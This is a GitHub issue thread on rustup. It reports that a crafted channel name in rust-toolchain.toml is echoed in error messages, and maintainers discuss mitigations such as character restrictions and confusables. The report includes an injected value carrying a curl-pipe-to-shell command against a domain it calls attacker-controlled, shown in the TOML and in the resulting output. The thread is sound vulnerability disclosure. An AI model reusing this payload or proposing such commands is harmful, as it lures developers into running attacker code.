### ISSUE TITLE
Toolchain Channel Manipulation within Rustup

### ISSUE THREAD

**Issue by kevin-valerio** [rust-lang/rustup#4053]
### Verification

- [x] I searched for recent similar issues at https://github.com/rust-lang/rustup/issues?q=is%3Aissue+is%3Aopen%2Cclosed and found no duplicates.
- [x] I am on the latest version of Rustup according to https://github.com/rust-lang/rustup/tags and am still able to reproduce my issue.

### Problem

The bug involves the Rust toolchain accepting malformed channel names in `rust-toolchain.toml`, which could lead to custom user-defined error messages. A malicious message could suggest installing a toolchain using a specific command that shouldn't be prompted. 

### Steps to Reproduce
 
1. Edit your `rust-toolchain.toml`.
2. Change the `channel` to:
 
```toml
[toolchain]
channel = "nightly', please install with 'curl --proto '=https' --tlsv1.2 -sSf https://sh.rust-toolchain.rs/ | sh -s -- --default-toolchain nightly -y"
```
 
3. Execute commands such as `cargo fmt`, `cargo build`, `cargo --version`, `rustc`, `clippy-driver`, `rust-gdbgui`, etc.

### Output
Where https://sh.rust-toolchain.rs/ is an attacker-controlled domain:

```shell
❯ cargo
error: invalid toolchain name 'nightly', please install with 'curl --proto '=https' --tlsv1.2 -sSf https://sh.rust-toolchain.rs/ | sh -s -- --default-toolchain nightly -y'
 
❯ rustc
error: invalid toolchain name 'nightly', please install with 'curl --proto '=https' --tlsv1.2 -sSf https://sh.rust-toolchain.rs/ | sh -s -- --default-toolchain nightly -y'
```

### Possible Solution(s)

Ensure that the `channel` is set to a valid value, following a strict format, such as:
 
- `stable`, `beta`, `nightly`
- `nightly-2023-01-01`, `beta-2024-01-02`, `stable-2022-03-03`
- `1.56.0`, `1.70`

### Notes

This could be exploited by an attacker to conduct social engineering attacks, without needing the victim to compile, run tests, or build the project. The attacker could manipulate users into executing rogue commands without requiring the compilation, testing, or building of a project, and without modifying the most important part of a Rust project : .rs file and Cargo.toml, making it more stealthy to detect.

### Rustup version

rustup 1.27.1 (54dd3d00f 2024-04-24)

### Installed toolchains

Default host: aarch64-apple-darwin
rustup home:  /.../.rustup

installed toolchains

stable-aarch64-apple-darwin
beta-aarch64-apple-darwin
nightly-2023-11-01-aarch64-apple-darwin
nightly-2023-12-30-aarch64-apple-darwin
nightly-2024-01-21-aarch64-apple-darwin
nightly-2024-02-08-aarch64-apple-darwin
nightly-2024-03-26-aarch64-apple-darwin
nightly-2024-08-08-aarch64-apple-darwin
nightly-2024-08-13-aarch64-apple-darwin
nightly-aarch64-apple-darwin (default)
1.66.1-aarch64-apple-darwin
1.68.2-aarch64-apple-darwin
1.69.0-aarch64-apple-darwin
1.71.0-aarch64-apple-darwin
1.72.0-aarch64-apple-darwin
1.73.0-aarch64-apple-darwin
1.74.0-aarch64-apple-darwin
1.75.0-aarch64-apple-darwin
1.78.0-aarch64-apple-darwin
1.63-aarch64-apple-darwin

installed targets for active toolchain

aarch64-apple-darwin
wasm32-unknown-unknown
x86_64-unknown-linux-gnu

active toolchain

nightly-aarch64-apple-darwin (overridden by 'rust-toolchain.toml')
rustc 1.84.0-nightly (e7c0d2750 2024-10-15)

### OS version

macOS M2 - Darwin 23.6.0 Darwin Kernel Version 23.6.0 - arm64

**Comment by rami3l** [comment]
@kevin-valerio Thanks a lot for filing the issue, and this is a really nice catch!

However:
> Ensure that the channel is set to a valid value, following a strict format

This is impossible (or at least breaking) since we are currently allowing virtually any string as a toolchain name (this is particularly useful for `rustup toolchain link`):

```console
> rustup toolchain link --help
Create a custom toolchain by symlinking to a directory

Usage: rustup[EXE] toolchain link <TOOLCHAIN> <PATH>

Arguments:
  <TOOLCHAIN>  Custom toolchain name
  <PATH>       Path to the directory

Options:
  -h, --help  Print help

Discussion:
    'toolchain' is the custom name to be assigned to the new toolchain.
    Any name is permitted as long as:
    - it does not include '/' or '\' except as the last character
    - it is not equal to 'none'
    - it does not fully match an initialsubstring of a standard release channel.
[..]
```

Given that, I wonder what we can do to mitigate this. Only allowing ASCII w/o whitespace/special characters? Changing the error message to be less smart, probably? Or issuing a warning for non-official toolchain names?

And if we do want to do this, I think it should make it into the upcoming v1.28 release cycle.

cc @rbtcollins @djc @ChrisDenton

**Comment by ChrisDenton** [comment]
Some ideas, not mutually exclusive:
 
- Colour/highlight the toolchain name (this wouldn't be enough on its own as colours aren't always seen)
- Treat toolchain names coming from `rust-toolchain.toml` as untrusted. Don't print them if they don't exist and instead just refer to the toolchain file.
- Disallow `'` and newline and other whitespace characters
- Restrict to [Unicode identifier](https://www.unicode.org/reports/tr31/) characters with some allowed special characters such as `-` (there are crates to help with this)

I do feel it would be good to place at least *some* restrictions on toolchain names but I am mindful that it may break someone's workflow. Restricting to ASCII may be too restrictive hence my Unicode suggestion. But even that could break someone, though it may be acceptable breakage. Just disallowing certain problematic characters is a possibility but I personally prefer to have an explicitly allowed set to avoid having to think through every possible problem with the full range of Unicode in every language.

I wouldn't want to skip printing the toolchain name in the general case because it does help diagnose what went wrong. And I'd rather avoid potentially noisy warnings if possible. Unless the warning is a prelude to it becoming a hard error.

**Comment by djc** [comment]
Seems like it would be substantially mitigating if we just disallow whitespace and quotes in the toolchain name (for display, and maybe generally?). Those seem like reasonably straightforward restrictions that shouldn't hurt too much, and should make it hard to make stuff confusing as in the OP.

**Comment by ChrisDenton** [comment]
We would at least need to account for confusables. Such as `ꞌ` (U+A78C LATIN SMALL LETTER SALTILLO).

**Comment by rami3l** [comment]
Sorry, I might have misled you by bringing up `rustup toolchain link --help`. I think we need to address this in both aspects:

1. It is worth noticing that `nightly', please install with 'curl --proto '=https' --tlsv1.2 -sSf https://sh.rust-toolchain.rs/ | sh -s -- --default-toolchain nightly -y"` is already an ILLEGAL toolchain name even in today's standards, it's just that the ERROR MESSAGE is being overly generic, so in this regard I think we first need to make it less smart. So I agree with @ChrisDenton here:

    > Treat toolchain names coming from rust-toolchain.toml as untrusted.

    ... given that we come up with a proper alternative wording for that error message. This can be the first immediate step that will get shipped in the new release.

2. Still, allowing special characters in toolchain names feels like too unrestrictive. We can continue to discuss what is allowed later on. However I think it should be a clearly-defined list of characters, not the complement of a smaller "banned" set.

**Comment by ChrisDenton** [comment]
That makes sense. It also makes me think we could have a specific error for if the `rust-toolchain.toml` file contains a toolchain name that can never be valid rather than a valid but non-existent toolchain name.
